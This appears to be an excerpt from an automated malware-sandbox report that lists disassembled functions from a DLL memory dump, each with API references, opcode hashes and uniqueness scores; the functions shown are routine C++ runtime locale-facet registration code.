                                                                                                                                  • Instruction Fuzzy Hash: DF01ED3191061ACBCB01DBE8C954AEDB7B9AF853A8F114C08D8106B2C0DB74D90BCB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F760E, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7615
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F761F
                                                                                                                                  • int.LIBCPMT ref: 6E8F7636
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F7659
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7670
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7690
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F769D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: aa920c784afd7c0b5a05082a07aefc037d607c27282b2d292fb4f4cc37df7121
                                                                                                                                  • Instruction ID: 240f73b79692adb266f9e352a6cceda0ba1cb31d7153e4a98ae88e4c048d88c1
                                                                                                                                  • Opcode Fuzzy Hash: aa920c784afd7c0b5a05082a07aefc037d607c27282b2d292fb4f4cc37df7121
                                                                                                                                  • Instruction Fuzzy Hash: 1301E131900619DBCB01DFE8C8546ED77796F853A8F214D19D4106B2C0DF74D94B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F6FA7, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F6FAE
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F6FB8
                                                                                                                                  • int.LIBCPMT ref: 6E8F6FCF
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • codecvt.LIBCPMT ref: 6E8F6FF2
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7009
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7029
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7036
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2133458128-0
                                                                                                                                  • Opcode ID: 1bf6b899ca101f06567fbfbbed79e65931f40c395f16963f4a753757d9e63fa6
                                                                                                                                  • Instruction ID: 641ef61c77950bc5d8721f6d2b253bb4c85b23ef45c02d880657e616d279af3f
                                                                                                                                  • Opcode Fuzzy Hash: 1bf6b899ca101f06567fbfbbed79e65931f40c395f16963f4a753757d9e63fa6
                                                                                                                                  • Instruction Fuzzy Hash: AE01003290061ADBCF01DBE8C944AED7BBAAF95398F100D09E4106B2C0DF709907CB80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F77CD, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F77D4
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F77DE
                                                                                                                                  • int.LIBCPMT ref: 6E8F77F5
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F7818
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F782F
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F784F
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F785C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: a656823e91607e937b017622b5daf447ed7c11b26feaf54d0728b322e38f090d
                                                                                                                                  • Instruction ID: e9d54880b63d4297d821e5a849d6e6e4b2f9fe06f028f4bb3899fcccbeecd907
                                                                                                                                  • Opcode Fuzzy Hash: a656823e91607e937b017622b5daf447ed7c11b26feaf54d0728b322e38f090d
                                                                                                                                  • Instruction Fuzzy Hash: CB01AD7191061ADBCF01DBE8C854AEE7B7AAF85798F110D09D8207B2C0DFB4994BCB85
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F6F12, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F6F19
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F6F23
                                                                                                                                  • int.LIBCPMT ref: 6E8F6F3A
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • codecvt.LIBCPMT ref: 6E8F6F5D
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F6F74
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F6F94
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F6FA1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2133458128-0
                                                                                                                                  • Opcode ID: d1030b06d2f5aa4121ea26ec50ad6b57fbb90372484cb71ff553ba46f0a8e890
                                                                                                                                  • Instruction ID: fb9337e4f7512081448f26087920015ea042424f418dd1f09609624ad285655d
                                                                                                                                  • Opcode Fuzzy Hash: d1030b06d2f5aa4121ea26ec50ad6b57fbb90372484cb71ff553ba46f0a8e890
                                                                                                                                  • Instruction Fuzzy Hash: F601007190061ACFCF01DBE8C9546EDB7BAAF853A8F100D08E4107B280DF749D078B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7738, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F773F
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7749
                                                                                                                                  • int.LIBCPMT ref: 6E8F7760
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F7783
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F779A
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F77BA
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F77C7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: faf2082c7afb7bd9763d18addb3220ca3261c5e75caf2aabfa48005d1af7bd5f
                                                                                                                                  • Instruction ID: b3061b1730628ee052c02a71ad862e3970b0d98f4f76a6cdc7e4c448357d2560
                                                                                                                                  • Opcode Fuzzy Hash: faf2082c7afb7bd9763d18addb3220ca3261c5e75caf2aabfa48005d1af7bd5f
                                                                                                                                  • Instruction Fuzzy Hash: 4E010431910516CBCF01DBE8C954AFDB7796F99398F100C09D8107B2D0DF70990B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E9054C2, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E9054C9
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E9054D3
                                                                                                                                  • int.LIBCPMT ref: 6E9054EA
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E90550D
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E905524
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E905544
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905551
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: a06535d85f0b3ea2673badb76d1f2055795cb7b6462a15ea719969377ba90d4d
                                                                                                                                  • Instruction ID: f5696bb098a0e7b2ed37def93ee7a32f4ece3faac1e19897fcf2bc001d178cfa
                                                                                                                                  • Opcode Fuzzy Hash: a06535d85f0b3ea2673badb76d1f2055795cb7b6462a15ea719969377ba90d4d
                                                                                                                                  • Instruction Fuzzy Hash: 7701ED71900615DBCF11DBE8C854AEDB7BAAF85358F504C0DD8206B280DB74DE46CF80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E905557, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90555E
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E905568
                                                                                                                                  • int.LIBCPMT ref: 6E90557F
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E9055A2
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9055B9
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E9055D9
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E9055E6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: c1ea7862f15c28b928574993d6450b2d3595b8ede1b35c607808d22499b76cd5
                                                                                                                                  • Instruction ID: d66bf114ecf11d8b128a724da7dd0f1daab3a55ac3769e12fc767a5f95a6ee05
                                                                                                                                  • Opcode Fuzzy Hash: c1ea7862f15c28b928574993d6450b2d3595b8ede1b35c607808d22499b76cd5
                                                                                                                                  • Instruction Fuzzy Hash: 49010072900619DBCF21DBE8C9456ED77BAAF953A8F600D0CD4106B280DF74DA46CB80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7290, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7297
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F72A1
                                                                                                                                  • int.LIBCPMT ref: 6E8F72B8
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • messages.LIBCPMT ref: 6E8F72DB
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F72F2
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7312
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F731F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 958335874-0
                                                                                                                                  • Opcode ID: 6148d17e19e669118a9c7d215c3730a9007478641af2217ef0111155a445c5d8
                                                                                                                                  • Instruction ID: 1bd6b1eccf83cee218b1dc4075e10e2a352fe4bc22eb82e7fe894fbd58258e5a
                                                                                                                                  • Opcode Fuzzy Hash: 6148d17e19e669118a9c7d215c3730a9007478641af2217ef0111155a445c5d8
                                                                                                                                  • Instruction Fuzzy Hash: 9D01C07190461ADBCF01DFE8C954AEDB77AAF85398F200D09D8116B2D0DFB49A4BCB81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7AB6, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7ABD
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7AC7
                                                                                                                                  • int.LIBCPMT ref: 6E8F7ADE
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • numpunct.LIBCPMT ref: 6E8F7B01
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7B18
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7B38
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7B45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3064348918-0
                                                                                                                                  • Opcode ID: f9e8fdccd7ef7ffe49bdf6f7ad5993e411d630b581c20a7a7cceb702561d282c
                                                                                                                                  • Instruction ID: 1fd04e43a713bb7a8d9228d30eaace6a3c2a33949fddfb96c6b31c266e149b74
                                                                                                                                  • Opcode Fuzzy Hash: f9e8fdccd7ef7ffe49bdf6f7ad5993e411d630b581c20a7a7cceb702561d282c
                                                                                                                                  • Instruction Fuzzy Hash: 4F01C07190061ADBCF01DFE8C854AED777AAF96398F214D09D4106B2C0EF749A4B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F1AD7, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1ADE
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1AE8
                                                                                                                                  • int.LIBCPMT ref: 6E8F1AFF
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • ctype.LIBCPMT ref: 6E8F1B22
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1B39
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1B59
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1B66
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2958136301-0
                                                                                                                                  • Opcode ID: ef77c6b4966d63c09cacda65e5b84a76770a7e221276b492e748bbb6d7c8acb9
                                                                                                                                  • Instruction ID: 2057afe0d31d52383fc93f83b2f1115f96b2c7f9e72be75b99dbd3cfa2e0a647
                                                                                                                                  • Opcode Fuzzy Hash: ef77c6b4966d63c09cacda65e5b84a76770a7e221276b492e748bbb6d7c8acb9
                                                                                                                                  • Instruction Fuzzy Hash: 9101D671904619DBCF01DBE8C5546ED7B79AF95394F110D09D4107B2C0EF749E4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F1A42, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1A49
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1A53
                                                                                                                                  • int.LIBCPMT ref: 6E8F1A6A
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • codecvt.LIBCPMT ref: 6E8F1A8D
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1AA4
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1AC4
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1AD1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2133458128-0
                                                                                                                                  • Opcode ID: ae2f0db7674a33c6f5ff6855a267407b918b823691d5b967158aa5b0d1459ebf
                                                                                                                                  • Instruction ID: 354c60771521728602ca451080baead33746f97589350f32e13cab0830442618
                                                                                                                                  • Opcode Fuzzy Hash: ae2f0db7674a33c6f5ff6855a267407b918b823691d5b967158aa5b0d1459ebf
                                                                                                                                  • Instruction Fuzzy Hash: 3701C471940619DBCF01DBE8C5546ED7BB9AF853A8F254D09D4106B2C0DF74DD4B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E90526E, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E905275
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E90527F
                                                                                                                                  • int.LIBCPMT ref: 6E905296
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • collate.LIBCPMT ref: 6E9052B9
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9052D0
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E9052F0
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E9052FD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767075461-0
                                                                                                                                  • Opcode ID: 2eed192637e09d88a373c38c27f39900528ac146d74d65ce819387088e01eefe
                                                                                                                                  • Instruction ID: 8c0cb8829c9d2f9dcb842a8ac23ab8b2ed956377469617eedb0abc2e88dd3758
                                                                                                                                  • Opcode Fuzzy Hash: 2eed192637e09d88a373c38c27f39900528ac146d74d65ce819387088e01eefe
                                                                                                                                  • Instruction Fuzzy Hash: CB012231900619DBCF01DBE8C844AED777AAF81368F600C0DD4106B290DF70DD4A8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E905303, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90530A
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E905314
                                                                                                                                  • int.LIBCPMT ref: 6E90532B
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • messages.LIBCPMT ref: 6E90534E
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E905365
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E905385
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905392
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 958335874-0
                                                                                                                                  • Opcode ID: 843274685affb6d2bc098e73c858a0ed6015018e3ef86f9a76d05027db0a5d40
                                                                                                                                  • Instruction ID: deb8aa9bdcdc5cdb8cc6735c6ed670858e15f3c80cd183a1fa110ae5c5832192
                                                                                                                                  • Opcode Fuzzy Hash: 843274685affb6d2bc098e73c858a0ed6015018e3ef86f9a76d05027db0a5d40
                                                                                                                                  • Instruction Fuzzy Hash: F401ED72900619DFCF01DBE8C854AEEB7B9AF85358F504D0DE8106B290DBB0DE4A8F80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7325, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F732C
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7336
                                                                                                                                  • int.LIBCPMT ref: 6E8F734D
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • messages.LIBCPMT ref: 6E8F7370
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7387
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F73A7
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F73B4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 958335874-0
                                                                                                                                  • Opcode ID: 6d8946abbfafc9c40bfdc8b2b07d8c7c69fe468551c8a2c2cf66bd9548b56290
                                                                                                                                  • Instruction ID: 9575e5e61a4390badd4e25f0683986cac7934f083f7c7774aee7a73d61ba4d22
                                                                                                                                  • Opcode Fuzzy Hash: 6d8946abbfafc9c40bfdc8b2b07d8c7c69fe468551c8a2c2cf66bd9548b56290
                                                                                                                                  • Instruction Fuzzy Hash: A101003190061ADBCF01DBE8C944AEDBBB9BF85398F110C0AD8106B2D0DF709A0B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7B4B, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7B52
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7B5C
                                                                                                                                  • int.LIBCPMT ref: 6E8F7B73
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • numpunct.LIBCPMT ref: 6E8F7B96
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7BAD
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7BCD
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7BDA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3064348918-0
                                                                                                                                  • Opcode ID: 62d9aac8ab43bba6c502e09c440079de329dca2f8907b555afcd648bed3fa852
                                                                                                                                  • Instruction ID: c53ceb8393b6e1ad8fb1c02e28e8924dd44ce970e8b123cca8a85baafca2e198
                                                                                                                                  • Opcode Fuzzy Hash: 62d9aac8ab43bba6c502e09c440079de329dca2f8907b555afcd648bed3fa852
                                                                                                                                  • Instruction Fuzzy Hash: CD01C431900519DBCF01DBE8C954AEDB779AF95398F104D09D410AB2C0DF74D94B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F70D1, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F70D8
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F70E2
                                                                                                                                  • int.LIBCPMT ref: 6E8F70F9
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • collate.LIBCPMT ref: 6E8F711C
